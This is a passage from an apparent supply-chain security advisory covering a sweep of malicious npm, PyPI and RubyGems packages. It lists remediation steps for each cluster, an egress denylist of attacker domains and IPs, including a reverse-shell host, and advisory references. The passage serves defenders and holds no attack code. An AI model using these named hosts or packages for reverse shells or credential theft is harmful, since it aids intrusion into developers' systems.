2. **For Cluster A (`@baanx/*` + `@insiderintelligence/*` algamil7x day 7)**: keep the `oob.algamil7x.xyz` resolver block in place from prior days (this is now nine consecutive days from the same operator). The `.xyz` zone block is the durable mitigation because the operator picks a fresh internal-lookalike scope every 24 hours. Rotate any credential accessible from a host that install-ran any `@baanx/*` or `@insiderintelligence/*` package in the last two weeks
3. **For Cluster B (`@rixxcodex/baileys` + `sea-baileys`)**: uninstall on hit and treat the associated WhatsApp session as fully compromised - revoke it in Linked Devices, reset the account password if you use one, review recent linked-device activity for unfamiliar sessions. Rotate any Signal identity keys if the package touched a real Signal or WhatsApp session. Block GitHub raw content requests to `raw.githubusercontent.com/skyzopedia/*` at CI egress. Any Baileys wrapper installed from an unfamiliar scope should be uninstalled and replaced with `@whiskeysockets/baileys` from the official maintainer
4. **For Cluster C (`pino-testkit` chai/pino/jsonspack family extension)**: audit any `pino` or `chai` plugin your projects import for author-metadata spoofing (real pino/chai maintainers listed as author/contributors on packages they never authored is a strong indicator). `--ignore-scripts` does NOT block this family - the RCE fires when the module is loaded, not on install. Block `jsonspack.com` at CI egress (same infrastructure as the chai-family; new lure name, same operator)
5. **For Cluster D (`vite-dev-launcher` mall4cloud-react RAT sibling)**: block `npmjs.it.com` at your resolver AND at your web proxy (established C2 domain for this operator from yesterday`s `@vitemirrorte` incident). If any developer or CI runner touched a `mall4cloud-react` fork in the last 72h and installed `vite-dev-launcher`, `@vitemirrorte/element-plus-vite-cli`, or any Vite-adjacent package under an unfamiliar scope, assume that workstation is fully compromised: image it, do not attempt in-place cleanup. Rotate every credential visible to the parent Node process (SSH keys, cloud tokens, git credentials, IDE tokens). Delete `~/.gradle/caches/transforms-3/` on remediated hosts and rebuild Gradle from a known-clean source
6. **For Cluster E (`memoryos` PyPI + `@memtensor/memos-cloud-openclaw-plugin` npm)**: uninstall on hit. For `memoryos`, this is a **maintainer-account compromise** of a legitimate PyPI package - anyone who ran `pip install memoryos==2.0.34` between publish and yank has an infostealer already exfiltrated. Rotate all cloud provider access keys and IAM session tokens on any host that installed the version. Verify the current published `memoryos` version is from the legitimate maintainer, not a re-uploaded compromised version
7. **For Cluster F (`internallib_v657` + `internallib_v463` new-subnet reverse shell)**: block outbound HTTP to `10.0.73.186` AND `10.0.5.109` at CI network egress (both subnets are now confirmed operator infrastructure). Block `reverse-shell.sh` at CI egress (unencrypted-HTTP curl-pipe from install-time is the primitive). If your org runs any `internallib_v<NNN>` internal scope, the campaign has enumerated your version numbers now across two subnets - review your private-registry access logs for any public-npm resolution attempts against the `internallib_v*` naming pattern
8. **For Cluster G (`godzz`/`godzzz` credential exfil)**: uninstall on hit. If any developer installed either package, they have to (a) revoke and rotate any Groq API key the compromised process could have seen (the operator`s bundled `gsk_...` key is *distributed* by the malware but the local Groq key in `.env` or `~/.config/groq/` is also read), (b) close any open Chromium browser session that had DevTools Protocol enabled - the malware read active page content and editor text, so any authenticated session in the browser (SSO, email, cloud console) is exfiltrated, (c) block `test0ing7.workers.dev` at your resolver. The `NODE_TLS_REJECT_UNAUTHORIZED=0` side-effect persists for the lifetime of any long-running Node process the package touched
9. **For Cluster H (recon-only beacons)**: uninstall on hit. Rotate no credentials (these packages beacon platform + hostname only, no secret material). Block `oast.fun`, `pipedream.net`, `ngrok-free.dev`, and direct-IP outbound HTTP from CI to `5.189.173.113` at network egress. `com.apple.unityplugin.storekit` should be pinned to your internal registry with `.npmrc` if your org has any Unity/Apple StoreKit integration - the name is a plausible internal-name lure
10. **For Cluster I (`hachutis` undeclared-binary tunnel)**: uninstall on hit. Any host that ran the CLI - directly or via a package that transitively invoked the binary - has an established Cloudflare Tunnel channel to the operator. Block `*.trycloudflare.com` at CI egress by default and allowlist only the tunnels your org actually uses. Grep `node_modules/*/bin/` for undeclared binaries (not declared in `package.json` `bin` field) as a general hygiene sweep - this pattern is showing up more often across the corpus
11. **For Cluster J (`wurl_show_data` rubygems)**: uninstall on hit. Payload is undisclosed so treat as install-time compromise; rotate credentials accessible from any host that ran `bundle install` on a Gemfile that pinned the version
12. For every `npm install` in CI, prefer `--ignore-scripts` and enforce it at the runner level (note it does NOT block Clusters C or D - both fire at `require`/module-load, not on install script). Layer with egress denylists on `oob.algamil7x.xyz`, `raw.githubusercontent.com/skyzopedia/*`, `npmjs.it.com`, `jsonspack.com`, `reverse-shell.sh`, `ai-script.test0ing7.workers.dev`, `dapnhid534ch06s9vpm0mbg1httu5gytc.oast.fun`, `eoy34oyrep9j5x8.m.pipedream.net`, `estimator-nemeses-unwatched.ngrok-free.dev`, `already-query-bacteria-agreed.trycloudflare.com`, `5.189.173.113`, `10.0.73.186`, and `10.0.5.109`. Extend the pin-lists from prior sweeps with `@baanx/common`, `@baanx/domain`, `@insiderintelligence/componentlibrary`, `@rixxcodex/baileys`, `@rixxcodex/libsignal`, `sea-baileys`, `@otaxayun/libsignal-node`, `pino-testkit`, `vite-dev-launcher`, `@memtensor/memos-cloud-openclaw-plugin`, `internallib_v657`, `internallib_v463`, `godzz`, `godzzz`, `com.apple.unityplugin.storekit`, `simplenewnpmpackage`, `a-onesite`, `event-hunter`, `helpersutils-dev-tools`, `hachutis`, and pip `memoryos`, rubygems `wurl_show_data`

## Check your own dependencies

- Check a package-lock.json against this incident: https://dependencywatch.io/check/package-lock-json
- Check a requirements.txt against this incident: https://dependencywatch.io/check/requirements-txt

The scan runs entirely in the browser; lockfile contents are never uploaded.

## References

- [GitHub Advisory Database - recent malware advisories](https://github.com/advisories?query=type%3Amalware&sort=published-desc) - GitHub
- [GHSA-27jh-hjhg-vg2p - @baanx/common (Cluster A - algamil7x day 7)](https://github.com/advisories/GHSA-27jh-hjhg-vg2p) - GitHub
- [GHSA-qhfc-6rp6-pwv6 - @baanx/domain (Cluster A - algamil7x day 7)](https://github.com/advisories/GHSA-qhfc-6rp6-pwv6) - GitHub
- [GHSA-rjh6-qm48-cg84 - @insiderintelligence/componentlibrary (Cluster A - algamil7x day 7)](https://github.com/advisories/GHSA-rjh6-qm48-cg84) - GitHub
- [GHSA-fjxf-mv8f-cp6x - @rixxcodex/baileys (Cluster B - undocumented WhatsApp channels + unpinned @rixxcodex/libsignal HEAD)](https://github.com/advisories/GHSA-fjxf-mv8f-cp6x) - GitHub
- [GHSA-9xjg-g5r3-xpj8 - sea-baileys (Cluster B - libsignal remap to @otaxayun/libsignal-node@latest + newsletter JID injection)](https://github.com/advisories/GHSA-9xjg-g5r3-xpj8) - GitHub
- [GHSA-q57p-68r4-fj72 - pino-testkit (Cluster C - chai/pino/jsonspack family Function-constructor RCE)](https://github.com/advisories/GHSA-q57p-68r4-fj72) - GitHub
- [GHSA-pg2r-jxrr-mx5j - vite-dev-launcher (Cluster D - mall4cloud-react RAT sibling, ~/.gradle/caches/ persistence)](https://github.com/advisories/GHSA-pg2r-jxrr-mx5j) - GitHub
- [GHSA-hxf9-rvj5-h45h - memoryos pip (Cluster E - maintainer-account compromise infostealer)](https://github.com/advisories/GHSA-hxf9-rvj5-h45h) - GitHub
- [GHSA-mhjf-v53x-7p87 - @memtensor/memos-cloud-openclaw-plugin (Cluster E - openclaw plugin)](https://github.com/advisories/GHSA-mhjf-v53x-7p87) - GitHub
- [GHSA-w2wx-86qr-g533 - internallib_v657 (Cluster F - 10.0.73.186:443 curl-pipe reverse shell, new subnet)](https://github.com/advisories/GHSA-w2wx-86qr-g533) - GitHub
- [GHSA-gv94-v8fj-f45c - internallib_v463 (Cluster F - reverse-shell.sh/10.0.73.186:443, "Primeiro PWN")](https://github.com/advisories/GHSA-gv94-v8fj-f45c) - GitHub
- [GHSA-p6cq-66pp-9r5g - godzz (Cluster G - Cloudflare Worker + Groq API key exfil + Chromium CDP scrape)](https://github.com/advisories/GHSA-p6cq-66pp-9r5g) - GitHub
- [GHSA-6j9r-v67w-r8w4 - godzzz (Cluster G - cdp_inject.js credential exfil sibling)](https://github.com/advisories/GHSA-6j9r-v67w-r8w4) - GitHub
- [GHSA-6r46-f382-x53p - com.apple.unityplugin.storekit (Cluster H - Apple/Unity impersonation, oast.fun beacon)](https://github.com/advisories/GHSA-6r46-f382-x53p) - GitHub
- [GHSA-mr2p-c47m-85w8 - simplenewnpmpackage (Cluster H - same oast.fun subdomain as com.apple.unityplugin.storekit)](https://github.com/advisories/GHSA-mr2p-c47m-85w8) - GitHub
- [GHSA-9j7m-m3w9-mgrc - a-onesite (Cluster H - Pipedream unencrypted-HTTP wget beacon)](https://github.com/advisories/GHSA-9j7m-m3w9-mgrc) - GitHub
- [GHSA-wwrq-gcqx-rx6p - event-hunter (Cluster H - "DepConfusion to RCE POC" ngrok beacon)](https://github.com/advisories/GHSA-wwrq-gcqx-rx6p) - GitHub
- [GHSA-w43w-f8m4-5r39 - helpersutils-dev-tools (Cluster H - 5.189.173.113:8899 direct-IP HTTP beacon)](https://github.com/advisories/GHSA-w43w-f8m4-5r39) - GitHub
- [GHSA-9rj9-xh7c-qqh8 - hachutis (Cluster I - undeclared bin/cli binaries + trycloudflare tunnel)](https://github.com/advisories/GHSA-9rj9-xh7c-qqh8) - GitHub
- [GHSA-345f-5r88-8j64 - wurl_show_data rubygems (Cluster J - OSSF-flagged malware, no analysis)](https://github.com/advisories/GHSA-345f-5r88-8j64) - GitHub
- [jaschadub/compromised-packages-check](https://github.com/jaschadub/compromised-packages-check) - jaschadub
- [OpenSSF malicious-packages repository](https://github.com/ossf/malicious-packages) - OpenSSF

---

Canonical page: https://dependencywatch.io/incident/multi-2026-09-24-ghsa-malware-sweep
Markdown version: https://dependencywatch.io/incident/multi-2026-09-24-ghsa-malware-sweep.md
Site index for agents: https://dependencywatch.io/llms.txt
DependencyWatch.io is operated by Precursor Security (https://precursorsecurity.com).
